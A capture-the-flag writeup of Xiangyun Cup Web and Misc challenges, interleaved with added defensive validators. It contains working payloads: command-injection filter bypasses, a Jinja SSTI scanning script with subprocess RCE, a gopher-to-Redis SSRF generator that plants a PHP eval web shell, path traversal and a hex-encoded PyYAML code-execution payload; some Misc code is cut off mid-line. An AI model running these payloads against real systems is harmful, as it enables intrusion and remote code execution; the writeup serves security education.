祥云杯 (Xiangyun Cup)
Web
★sign
1%09||%09ls%09/
1%09||%09ca\t%09in\dex.p\hp (the output flashes past here)
1%09||find%09/%09-name%09`echo%09ZmxhKg==|base64%09-d`
Find the flag:
1%09||ca\t%09/`echo%09L2V0Yy8uZmluZGZsYWcvZmxhZy50eHQ=|base64%09-d`
★flaskbot
Enter a name.
A float check has to be bypassed; nan goes straight through it.
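Why nan slips through: every comparison against float('nan') is False, so a range check phrased as "reject if out of bounds" never rejects it. The two functions below are an added illustration written for this writeup, not code from the challenge; the range 0..100 and the handler shape are assumptions.

```python
import math


def is_valid_guess_naive(raw, low=0.0, high=100.0):
    """Range check written the way a quick handler often writes it.
    float('nan') compares False against everything, so neither half of
    the rejection test fires and the value is accepted (assumed handler shape)."""
    num = float(raw)
    if num < low or num > high:
        return False
    return True


def is_valid_guess(raw, low=0.0, high=100.0):
    """Hardened check: parse, refuse anything float() accepts that is not
    a finite number (nan, inf, -inf, and overflowing literals such as 1e999),
    then state the accepted range positively rather than the rejected one."""
    try:
        num = float(raw)
    except (TypeError, ValueError):
        return False
    if not math.isfinite(num):
        return False
    return low <= num <= high
```

The positive form `low <= num <= high` is already False for nan on its own; the explicit `math.isfinite` test is there so that inf and -inf are rejected with the same rule instead of relying on the comparison happening to fail.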
There is a cookie; base64-decoding it gives the username that was just entered.
Change it to any other username.
Whatever is entered gets echoed back, so go straight for template injection.
Reading a file throws an error, and the debug page shows this is Python 2. After digging through material for a while I came back to a challenge I had written up earlier: https://blog.csdn.net/SopRomeo/article/details/108985950
It has this class.
So it is basically the same challenge; run a scan over the subclass index:
import requests
import base64
import time
import html

data = {'num': 'nan'}
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}
for i in range(0, 300):
    time.sleep(0.06)
    url = 'http://eci-2zechif0ewh08bt6v1jm.cloudeci1.ichunqiu.com:8888/guess'
    # probe subclass index i; the template is read from the base64 'user' cookie
    payload = "{{\'\'.__class__.__mro__[2].__subclasses__()[%s]}}" % i
    payload = base64.b64encode(bytes(payload, encoding='utf-8'))
    cookie = {'user': str(payload, encoding='utf-8')}
    r = requests.post(url, headers=header, data=data, cookies=cookie)
    text = html.unescape(r.text)
    print(text)
    if "subprocess.Popen" in text:
        print('------------------------------------------------------------------\n\n')
        print(html.unescape(r.text))
        print(i)
        break
Straight to RCE:
{{''.__class__.__mro__[2].__subclasses__()[258]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}
Found the flag.
"flag" is filtered; bypass it by splitting the string:
{{''.__class__.__mro__[2].__subclasses__()[258]('cat /super_secret_fla'+'g.txt',shell=True,stdout=-1).communicate()[0].strip()}}
★doyouknowssrf
https://my.oschina.net/u/4593189/blog/4646830
Bypass SSRF
http://eci-2zefxwpkl0ky0qxw9jp1.cloudeci1.ichunqiu.com/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http%253A%252F%252F127.0.0.1%253A6379%252F_*1%250D%250A%25248%250D%250Aflushall%250D%250A*3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval(%2524_GET%255B%2522cmd%2522%255D)%253B%253F%253E%250A%250A%250D%250A*4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%252Fvar%252Fwww%252Fhtml%250D%250A*4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A*1%250D%250A%25244%250D%250Asave%250D%250A
Script for generating the payload that hits the internal Redis:
# Python 2 script (urllib.quote, print statement)
import urllib

protocol = "gopher://"
ip = "127.0.0.1"
port = "6379"
shell = "\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename = "shell.php"
path = "/var/www/html"
passwd = ""
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # encode one command as a RESP multi-bulk array: *<argc>\r\n$<len>\r\n<arg>\r\n ...
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload
Once shell.php has been written, run commands to get the flag.
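What the SSRF URL above exploits is a disagreement about which host a URL names: the inner URL carries `root:root@127.0.0.1:5000@baidu.com`, and a check that reads the host one way can be satisfied while a fetcher that reads it another way talks to 127.0.0.1. The validator below is an added defender-side example, not the challenge's code; the allow-list, the hypothetical "stop at the first @" parser and the trimmed inner URL are assumptions introduced here. The writeup does not say how the target parsed the URL.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def hosts_seen_by_two_parsers(url):
    """Illustrate the ambiguity. RFC 3986 puts userinfo before the LAST '@'
    in the authority, which is what urllib does; a hand-rolled check that stops
    at the FIRST '@' (hypothetical, for illustration) reports a different host."""
    parts = urlsplit(url)
    rfc_host = parts.hostname or ""
    netloc = parts.netloc
    if "@" in netloc:
        after_first_at = netloc.split("@", 1)[1]
        first_at_host = after_first_at.split("@", 1)[0].split(":", 1)[0]
    else:
        first_at_host = netloc.split(":", 1)[0]
    return rfc_host, first_at_host


def check_outbound_url(url, allowed_hosts):
    """Gate a server-side fetch. Returns (ok, reason).
    Rejects non-http schemes (the Redis payload above rides on gopher://),
    any URL with userinfo (the '@' trick needs it), IP literals that are not
    globally routable (loopback, RFC 1918, link-local, unspecified), and
    hosts outside the allow-list."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if "@" in parts.netloc:
        return False, "userinfo in URL is not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # not an IP literal; it is a DNS name
    if ip is not None and not ip.is_global:
        return False, "non-public address: %s" % ip
    if host.lower() not in allowed_hosts:
        return False, "host not in allow-list: %r" % host
    return True, "ok"
```

This runs offline, so it only inspects IP literals. In production the DNS name must also be resolved and every resolved address passed through the same `is_global` test, and the fetcher must connect to the address that was checked (otherwise DNS rebinding reopens the gap); redirects need the same treatment on each hop.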
★easygogogo
On opening the challenge: arbitrary files can be uploaded but are not parsed, the uploaded filename is not changed, and the data is kept in a cookie that the server generates.
So I tried modifying the cookie to get arbitrary file read, but that did not work. Then I noticed the cookie is the same across containers, so I generated the cookie for ../../../../../../../flag in the first container, started a new container, modified the cookie there, and got arbitrary file read and the flag.
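The file read works because a filename taken from a client-controlled cookie is joined onto the upload directory as-is, so `../../../../../../../flag` climbs out of it. The two functions below are an added example for this writeup, not the challenge's code (the challenge is apparently a Go service; the root `/srv/uploads` and the handler shape here are assumptions): the first shows what an unchecked join resolves to, the second the usual fix.

```python
import os


def join_unchecked(upload_root, name):
    """What a handler that trusts the name from the cookie effectively does
    (assumed shape of the vulnerable code): join and normalise, no check."""
    return os.path.normpath(os.path.join(upload_root, name))


def resolve_upload_path(upload_root, name):
    """Map a client-supplied filename onto the upload directory and refuse
    anything that would leave it. Raises ValueError on traversal attempts."""
    root = os.path.realpath(upload_root)
    # Keep only the final component: directories, '..' and drive prefixes are dropped.
    base = os.path.basename(name.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise ValueError("invalid filename: %r" % name)
    candidate = os.path.realpath(os.path.join(root, base))
    # Defence in depth: confirm the resolved path still sits under root
    # (catches symlinks inside the upload directory pointing elsewhere).
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes upload root: %r" % name)
    return candidate
```

The second point in the writeup, that a cookie minted in one container is accepted by another, is a separate weakness: whatever secret signs or encrypts the cookie is shared across instances, so the path inside it is trusted wherever it is presented. The path check above is what stops that trust from turning into a file read.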
★easyzzz
A Baidu search turns up a lot of historical vulnerabilities. The site has /admin539, but brute-forcing got nowhere and no injectable point was found, so there are even fewer places on the front end that could give a shell.
Reference: https://www.anquanke.com/post/id/173991. The article mentions that the /search interface has an RCE, so I tried it and found that "if" is banned; looking for a bypass, the framework has a template tag {cutpic:} that can be used to get around it.
The command executes successfully; the payload is as follows:
{i{cutpic:}f:(print(cat /flag))}{end i{cutpic:}f}
★profile system
Testing shows there is directory traversal.
After auditing, the guess is that the vulnerability is in the yaml handling; reference:
https://github.com/yaml/pyyaml/issues/420
Exploit the pyyaml vulnerability for a remote hit. The challenge gives no output, so the output has to be redirected; the payload is hex-encoded here to get past the regex filter.
Payload:
!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - [ "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x22\x6f\x73\x22\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x22\x2f\x72\x65\x61\x64\x66\x6c\x61\x67\x20\x3e\x20\x75\x70\x6c\x6f\x61\x64\x73\x2f\x32\x2e\x74\x78\x74\x22\x29" ]
In addition, the cookie has to be forged to get into this branch:
if session['priviledge'] =='elite' and os.path.isfile(realpath):
A quick forgery, upload the file, construct the cookie, the output lands under uploads/, and the flag is in hand.
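The hex encoding in that payload defeats a filter that matches the raw YAML text, because the loader decodes `\xNN` escapes in a double-quoted scalar before anything runs. Below is an added detection example, not the challenge's filter: it normalises escapes before matching and flags `!!python/` tags outright. The marker list and the constructed sample are assumptions introduced here. It is a detection aid only; the fix for the underlying bug is loading untrusted YAML with `yaml.safe_load`, which does not honour `!!python/` tags at all.

```python
import re

PY_TAG = re.compile(r"!!python/[a-z/]+")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# tokens worth a second look once the document is decoded (assumed list)
SUSPICIOUS = ("__import__", "os.system", "subprocess", "eval(", "exec(")


def unescape_hex(text):
    """Decode \\xNN escapes the way a YAML double-quoted scalar is decoded,
    so the filter sees the same characters the loader will see."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def naive_scan(doc):
    """Regex over the raw text only: a hex-encoded string slips past it."""
    return [m for m in SUSPICIOUS if m in doc]


def scan_yaml_document(doc):
    """Findings for an untrusted YAML document: every language-specific tag
    present, plus suspicious tokens matched after unescaping."""
    findings = []
    for tag in sorted(set(PY_TAG.findall(doc))):
        findings.append("python-specific tag: " + tag)
    decoded = unescape_hex(doc)
    for marker in SUSPICIOUS:
        if marker in decoded:
            findings.append("suspicious token after unescaping: " + marker)
    return findings


# constructed sample: one !!python tag and a hex-encoded "__import__"
SAMPLE = '- !!python/name:eval\n- [ "\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f" ]\n'
```

`naive_scan(SAMPLE)` returns nothing, `scan_yaml_document(SAMPLE)` reports both the tag and the decoded token. YAML also has `\uXXXX` and `\UXXXXXXXX` escapes and allows strings to be split across lines; a real filter would have to normalise those too, which is one more reason to prefer a safe loader over pattern matching.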
Misc
★Sign-in
base64:ZmxhZ3txcV9ncm91cF84MjY1NjYwNDB9
Decoding it gives flag{qq_group_826566040}
★xixixi
The full contents of the disk are as follows (they can be recovered directly with WinHex):
# !i.py
import struct
from xixi import FAT32Parser
from xixixi import Padding, picDepartList


def EncodePieces():
    global clusterList
    res = []
    Range = len(picDepartList)  # 58
    # GetRandomClusterList(n) - Generate a random cluster list with length n
    clusterList = GetRandomClusterList(Range)
    for i in range(Range):
        if i != Range - 1:
            newCRC = struct.pack("
# !ixi.py
import struct


class FAT32Parser(object):
    def __init__(self, vhdFileName):
        with open(vhdFileName, 'rb') as f:
            self.diskData = f.read()
        self.DBR_off = self.GetDBRoff()
        self.newData = ''.join(self.diskData)

    def GetDBRoff(self):
        DPT_off = 0x1BE
        target = self.diskData[DPT_off+8:DPT_off+12]
        DBR_sector_off, = struct.unpack("
Analysing the two files:
The class FAT32Parser in !ixi.py performs a series of operations on the disk. !i.py splits the file into blocks: the image is divided into 58 blocks, and apart from the first block, which is left unencrypted, every block is processed as follows:
① The last four bytes of each block, i.e. the CRC checksum, are replaced with the cluster number of the block that follows it.
② Except for the first block, the content of each block is XORed as a whole with (that block's cluster number & 0xFE).
So to recover the image blocks, each block must first be XOR-decrypted, and then its last four bytes read to obtain the cluster number of the next block.
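The transformation described in ① and ② and the recovery order in the last sentence, as an added worked example for this writeup (not the challenge's !i.py or the exp script): the encoder follows the `if i != Range - 1` branch visible in !i.py, so the last block keeps its real CRC, and blocks are modelled as PNG chunks (length, type, data, CRC) because the exp reads an 8-byte chunk header. The cluster numbers, the sample chunks and the big-endian byte order of the stored cluster number are assumptions; the writeup's `struct.pack` format string is cut off.

```python
import struct
import zlib


def make_chunk(ctype, data):
    """Build a PNG-style chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def encode_pieces(pieces, clusters):
    """Apply the transformation the writeup describes. pieces[i] is block i
    (its last four bytes are the CRC), clusters[i] the cluster that holds it.
    Returns a dict {cluster: stored_bytes} standing in for the disk."""
    n = len(pieces)
    disk = {}
    for i, block in enumerate(pieces):
        data = bytearray(block)
        if i != n - 1:
            # CRC field overwritten with the next block's cluster number
            # (assumption: big-endian; the original format string is cut off)
            data[-4:] = struct.pack(">I", clusters[i + 1])
        if i != 0:
            key = clusters[i] & 0xFE
            data = bytearray(b ^ key for b in data)
        disk[clusters[i]] = bytes(data)
    return disk


def decode_pieces(disk, start_cluster, count):
    """Undo it: XOR every block after the first with its cluster & 0xFE,
    then read the trailing four bytes to find where the next block lives."""
    blocks = []
    cluster = start_cluster
    for i in range(count):
        data = bytearray(disk[cluster])
        if i != 0:
            key = cluster & 0xFE
            data = bytearray(b ^ key for b in data)
        blocks.append(bytes(data))
        if i != count - 1:
            cluster = struct.unpack(">I", data[-4:])[0]
    return blocks


def repair_crc(chunk):
    """Recompute the CRC the encoder overwrote, so the chunk is valid again."""
    length = struct.unpack(">I", chunk[:4])[0]
    body = chunk[4:8 + length]  # type + data
    return chunk[:8 + length] + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def demo():
    """Constructed sample: three chunks scattered over arbitrary clusters;
    returns True when the round trip restores the original chunks."""
    pieces = [make_chunk(b"IHDR", bytes(13)),
              make_chunk(b"IDAT", b"constructed image data"),
              make_chunk(b"IEND", b"")]
    clusters = [0x1A3, 0x2FF, 0x07C]
    disk = encode_pieces(pieces, clusters)
    recovered = [repair_crc(b) for b in decode_pieces(disk, clusters[0], len(pieces))]
    return recovered == pieces
```

Two details the prose glosses over and the code makes explicit: the XOR has to be undone before the trailing four bytes are read, because the cluster pointer was XORed along with the rest of the block; and since the pointer replaced the CRC, every block except the last needs its CRC recomputed before the image will pass a PNG checker.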
# -*- coding: utf-8 -*-
# @Project: Hello Python!
# @File   : exp
# @Author : Tr0jAn
# @Date   : 2020-11-22
import struct
import binascii
from xixi import FAT32Parser


def read(n):
    # read n bytes and XOR each one with (key & 0xFE)
    global key
    binary = b''
    for i in vhd.read(n):
        binary += (i ^ (key & 0xFE)).to_bytes(length=1, byteorder='big', signed=False)
    return binary


FAT = FAT32Parser("new.vhd")
vhd = open("new.vhd", "rb")
vhd.seek(0x27bae00)  # locate the image inside the disk
flag = open("flag.png", "wb")
flag.write(vhd.read(8))  # write the PNG header
key = 0
while True:
    d = read(8)
    length, cType = struct.unpack(">I4s", d)
    print(length, cType)  # length is